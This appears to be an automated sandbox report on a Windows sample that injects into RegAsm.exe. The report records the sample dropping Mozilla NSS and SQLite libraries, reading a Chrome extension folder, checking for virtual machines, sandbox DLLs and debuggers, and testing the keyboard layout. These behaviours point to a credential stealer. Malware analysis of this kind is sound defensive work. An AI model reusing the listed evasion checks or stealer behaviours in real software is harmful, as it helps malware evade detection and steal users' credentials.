Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: C:\5lpar31fck04x\Body.pdb source: file.exe
Source:	Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00418970 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00418970

Source: file.exe	Static PE information: section name: .00cfg
Source: sqln[1].dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00538CCD push ecx; ret	0_2_00538CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0045225C push ecx; ret	0_2_004975C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041A8B5 push ecx; ret	1_2_0041A8C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C41BF9 push ecx; ret	1_2_19DE4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C410C8 push ecx; ret	1_2_19E43552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqln[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\vcruntime140.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDHIIJJJKEGI\vcruntime140.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

1_2_00418970

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\file.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IDHIIJJJKEGI\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IDHIIJJJKEGI\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqln[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IDHIIJJJKEGI\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IDHIIJJJKEGI\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 1.0 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_004103D0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410502h

1_2_004103D0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EDB23 FindFirstFileExW,	0_2_004EDB23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EE007 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_004EE007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	1_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	1_2_00416740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00417800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00416F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004173C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040AAE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

1_2_00416BB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_004105A0 GetSystemInfo,wsprintfA,

1_2_004105A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: GIJKKKFC.1.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\tL
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: GIJKKKFC.1.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegAsm.exe, 00000001.00000002.2461606471.000000000144A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: GIJKKKFC.1.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: GIJKKKFC.1.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: GIJKKKFC.1.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: GIJKKKFC.1.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: GIJKKKFC.1.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: GIJKKKFC.1.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: GIJKKKFC.1.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: GIJKKKFC.1.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: GIJKKKFC.1.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: GIJKKKFC.1.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: GIJKKKFC.1.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000001.00000002.2461606471.000000000144A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: GIJKKKFC.1.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: GIJKKKFC.1.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: GIJKKKFC.1.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: GIJKKKFC.1.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: GIJKKKFC.1.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: GIJKKKFC.1.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: GIJKKKFC.1.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: GIJKKKFC.1.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: GIJKKKFC.1.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: GIJKKKFC.1.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: GIJKKKFC.1.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: GIJKKKFC.1.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: GIJKKKFC.1.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: GIJKKKFC.1.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: GIJKKKFC.1.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: GIJKKKFC.1.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: GIJKKKFC.1.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: GIJKKKFC.1.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_1-89379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_1-90482

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004A8405 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_004A8405

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

1_2_00418970

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F05BF mov eax, dword ptr fs:[00000030h]	0_2_004F05BF
